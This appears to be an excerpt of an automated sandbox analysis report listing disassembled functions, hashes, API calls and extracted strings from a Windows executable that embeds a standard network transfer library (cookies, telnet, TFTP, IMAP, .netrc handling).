                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcpy
                                        • String ID: value
                                        • API String ID: 3212548336-494360628
                                        • Opcode ID: 3a6df990b5da4fd9237ac89baa1238f9e86b9bdc232acfe0d6c5be0c13518a52
                                        • Instruction ID: 9c8cb01900b09e4844805b60c07a1b5d4ce1b607e83dff7fbf23d667cfae3568
                                        • Opcode Fuzzy Hash: 3a6df990b5da4fd9237ac89baa1238f9e86b9bdc232acfe0d6c5be0c13518a52
                                        • Instruction Fuzzy Hash: 01A17262E18B8586FB00CB69E4843AD2761EF417A8F605335EA6D53ADADFBCD085C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: fclosefree$__acrt_iob_func_strdupcallocfopenmalloc
                                        • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                        • API String ID: 4109794434-4095489131
                                        • Opcode ID: d97109d670ad7d893187d57730e2f018c256a9d765fb8c2d3200c8787d6c2d81
                                        • Instruction ID: 8bce48f1068fb56178758268d051b338d7060379b515a1e4ee0735125dad609b
                                        • Opcode Fuzzy Hash: d97109d670ad7d893187d57730e2f018c256a9d765fb8c2d3200c8787d6c2d81
                                        • Instruction Fuzzy Hash: 0761C421A0C79281EB569B2296543BA3F95FF46B8CF684435DE8D87782DFBCE405D310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$calloc$malloc
                                        • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)
                                        • API String ID: 3103867982-1477229593
                                        • Opcode ID: 9abc1dd8dd0e32e615b50650f2bfac574f46aaa96820c5a7c7ab5d149deeb8e1
                                        • Instruction ID: 477a52ad8b838460516c3e89da72d066ddccb80967ca09648e1e244f44e122be
                                        • Opcode Fuzzy Hash: 9abc1dd8dd0e32e615b50650f2bfac574f46aaa96820c5a7c7ab5d149deeb8e1
                                        • Instruction Fuzzy Hash: B6C14A72A04B5286EB90CF66E4502AE3BA4FF44B9CF610036EE4D87B59DFB8D845C740
                                        APIs
                                        • memset.VCRUNTIME140 ref: 00007FF6029EA69B
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029EA7C5
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6067
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6073
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029EA77F
                                          • Part of subcall function 00007FF6029B5FA0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029B5FB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freestrncpy$_strdupmemset
                                        • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                        • API String ID: 3826632026-748038847
                                        • Opcode ID: d2f07001c2f69f4ee10fc8dac9839346342ada0b1b8db9734aab457d2f6b462d
                                        • Instruction ID: db3d8f8e8465d1e2efd4a8f6e9db9e9bef82861205631924987ae183a25c6eb6
                                        • Opcode Fuzzy Hash: d2f07001c2f69f4ee10fc8dac9839346342ada0b1b8db9734aab457d2f6b462d
                                        • Instruction Fuzzy Hash: DF717E32A08AC694FB21DF16D4517E92B61FF8479CFA44132DA4C872A6EFBCD546C780
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: sendto$ErrorLast
                                        • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                        • API String ID: 4042023021-4197595102
                                        • Opcode ID: c6839c84e6b9a63ec9843bc45f807c9d82cf459fa3db2870afdf0a6d5b62c1db
                                        • Instruction ID: 4418df629a05d134f0ba125bfdf2bb5663124e38045c4e0f2a63e7d0a694df14
                                        • Opcode Fuzzy Hash: c6839c84e6b9a63ec9843bc45f807c9d82cf459fa3db2870afdf0a6d5b62c1db
                                        • Instruction Fuzzy Hash: AAB17D72608A82C6EB618F2AD4443A93BA4FF88F8CF644136DE4D8B759EF78D445C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID: #$%127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s%c%s$Sending data failed (%d)
                                        • API String ID: 1802528911-931584821
                                        • Opcode ID: d56252f6b80ea051241c5109bd59262046ebf78b474f7167e0eae9e28f2b2d3a
                                        • Instruction ID: b38b76ce2fcf58704a3bd2d0038c18a54588ce714080e12d0b5eccf4a70ff3d2
                                        • Opcode Fuzzy Hash: d56252f6b80ea051241c5109bd59262046ebf78b474f7167e0eae9e28f2b2d3a
                                        • Instruction Fuzzy Hash: C591AB32A08AC285F7218F15E4557EA67A1FF847ACF540231EE4C47A96EF7DD245C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$freestrchrstrncmpstrtol
                                        • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                        • API String ID: 2070079882-2404041592
                                        • Opcode ID: 0d3683d8005d69ee5ffb3116067f3daafc3a7abd7e6190d03c1856025e8e0299
                                        • Instruction ID: 3051bec0aa7213283b1da829d5fbc968206dce8f715aa915f9e45cc2c2c5cac1
                                        • Opcode Fuzzy Hash: 0d3683d8005d69ee5ffb3116067f3daafc3a7abd7e6190d03c1856025e8e0299
                                        • Instruction Fuzzy Hash: 5B51B021F0CAD646FB658B2698703792FD1AF45F9CF785431DE4D86286EEACE4858700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: fclosefree$__acrt_iob_func_strdupcallocfopenmalloc
                                        • String ID: Set-Cookie:$none
                                        • API String ID: 4109794434-3629594122
                                        • Opcode ID: 913f7715d8d12d44a7185297608bd26f8fbfa3b0ccd1ff80d61ee16f17f028ee
                                        • Instruction ID: 25a53481bff229d4584502581a4a3d8328f9853d5d746ad3fc21993d7c8f04c4
                                        • Opcode Fuzzy Hash: 913f7715d8d12d44a7185297608bd26f8fbfa3b0ccd1ff80d61ee16f17f028ee
                                        • Instruction Fuzzy Hash: 6151A731E0D78281FF569B23665027A6E90BF55B88F684434DE8E87B92DFBCE446C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$Unable to allocate trailing headers buffer !$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                        • API String ID: 3510742995-1652449680
                                        • Opcode ID: 4771c451f9aa9f06f84511dd60e3dffbe4946d72cc0a08215ffcad3856c162cd
                                        • Instruction ID: db637eed1483833f7ec15c8287e751088b1121002a22c9f5d1e58e3ea548d9a3
                                        • Opcode Fuzzy Hash: 4771c451f9aa9f06f84511dd60e3dffbe4946d72cc0a08215ffcad3856c162cd
                                        • Instruction Fuzzy Hash: 63A15132A08A8281EB50DF22D9503B92F55EF85F9CF785532DE5D8B686DEBCE4458310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_$APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Cannot SELECT without a mailbox.$Mime-Version$Mime-Version: 1.0$SELECT %s
                                        • API String ID: 1294909896-3146291949
                                        • Opcode ID: 8eba24e530ea5caf0d5228b31d68a2a44e2efc3ce809489f896ec9afce8c4c99
                                        • Instruction ID: 8299dbdc7c1d80558b1d48d42dd1fdb3c1cd45aa709b4760f1910bc1861d3b2f
                                        • Opcode Fuzzy Hash: 8eba24e530ea5caf0d5228b31d68a2a44e2efc3ce809489f896ec9afce8c4c99
                                        • Instruction Fuzzy Hash: 6C918035B0CB4286FB659B22959037D6A90EF45B8CF644435DB9DCB683EFACF4409340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                        • API String ID: 1865132094-1312055526
                                        • Opcode ID: 0c5a8c626145ccd31312ed3adb36d6ec9ea656c920a47348e4de85ad5a28c5a4
                                        • Instruction ID: ab9cfa694bf70a5009aa691cba4bedbb724e8b04b63edd522fe7aaae6ad63cbf
                                        • Opcode Fuzzy Hash: 0c5a8c626145ccd31312ed3adb36d6ec9ea656c920a47348e4de85ad5a28c5a4
                                        • Instruction Fuzzy Hash: 60718462A0C68385E7648B26D4403BD2EA1EF85F9CF380936DE4DC769ADFBDD4818351
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C18FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C191A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C192E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C194A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1967
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C198A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C199E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19B2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19D8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19EC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A00
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A4F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A5C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 95def14f1c7f15620b6fe9dc28262b73bc3905a93dfb7c3e10dc90a189a3b1e2
                                        • Instruction ID: d1fcdf976ab7c74666026d884fb07c36592769ffcd79c71ce738f6465e9e465a
                                        • Opcode Fuzzy Hash: 95def14f1c7f15620b6fe9dc28262b73bc3905a93dfb7c3e10dc90a189a3b1e2
                                        • Instruction Fuzzy Hash: 5851DD75A09A8281EB14DF22D4A02FD27A4FF84F88F684435DE5E8B656CF78D445C360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$free$strrchr$_access_stat64
                                        • String ID:
                                        • API String ID: 2557200964-0
                                        • Opcode ID: 84dbd7d387848211ce90fc92c2da0d7d496f12dbdcdf86f95287380649613b1b
                                        • Instruction ID: c3160b126b74021bcc51baf98d0c9e1a7f86ee2741e84cd13935be3bda4aa763
                                        • Opcode Fuzzy Hash: 84dbd7d387848211ce90fc92c2da0d7d496f12dbdcdf86f95287380649613b1b
                                        • Instruction Fuzzy Hash: 5141A221B09B4686FB51EB12A5903792BE4FF48B98F640034DE5D87B92EFBCE455C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy$strchr
                                        • String ID:
                                        • API String ID: 1615377186-0
                                        • Opcode ID: bd7767ed242e23caaf6037ae44a9cf72ff2c28187d5f66eb61473461553de434
                                        • Instruction ID: 6a5689fc7d89d977b08e33603d3663cca16007cf16c2cc3914c3cfc5201b04e5
                                        • Opcode Fuzzy Hash: bd7767ed242e23caaf6037ae44a9cf72ff2c28187d5f66eb61473461553de434
                                        • Instruction Fuzzy Hash: 0B519125B09B8281EB65EF16A61437A6A91BF44FC8F384831DE8D87745DFBCE845C310
                                        APIs
                                        Strings
                                        • Couldn't find host %s in the .netrc file; using defaults, xrefs: 00007FF6029C4619
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: Couldn't find host %s in the .netrc file; using defaults
                                        • API String ID: 2653869212-3983049644
                                        • Opcode ID: ec7257cd3be6c82d29b538beb3472177542acba6a0cd96cc2d8ebd84b6f6d315
                                        • Instruction ID: 5b8a18d39fe82891630152c6f90aba9fa787b934493da7fbc2c153d46f496da4
                                        • Opcode Fuzzy Hash: ec7257cd3be6c82d29b538beb3472177542acba6a0cd96cc2d8ebd84b6f6d315
                                        • Instruction Fuzzy Hash: 6271BF22B08B8286FB65DB26D5643AA6BA0FF84B48F341431DB5D87396DFBDE454C700
                                        APIs
                                        Strings
                                        • Couldn't find host %s in the .netrc file; using defaults, xrefs: 00007FF6029C4619
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: Couldn't find host %s in the .netrc file; using defaults
                                        • API String ID: 2653869212-3983049644
                                        • Opcode ID: 3b630d0dd12ce498ebf1f535dbbab8bc5a09ce093ad7ef4cbfe157d581e54d98
                                        • Instruction ID: c54bef108b0d80f27bfa6b34faee943af0b6132cd1f62e47f6c056f7a2d7a116
                                        • Opcode Fuzzy Hash: 3b630d0dd12ce498ebf1f535dbbab8bc5a09ce093ad7ef4cbfe157d581e54d98
                                        • Instruction Fuzzy Hash: AD51A062A08B8286EB65DB26E56436E3BA0FF84B98F251431CB5D87356DFBDE450C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_BUFFER_TOO_SMALL
                                        • API String ID: 600764987-1965992168
                                        • Opcode ID: adb4d3cc1ad15402be98744665676a234ebf3bef7a905d6a1a81ce6623857e9d
                                        • Instruction ID: 18c9e0ccce5123f6399b1b862df60088848907ec65c0abb4b005329e1a7f0814
                                        • Opcode Fuzzy Hash: adb4d3cc1ad15402be98744665676a234ebf3bef7a905d6a1a81ce6623857e9d
                                        • Instruction Fuzzy Hash: B2317022A0D7C285EB629F21E5543BE7BA0FF85748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
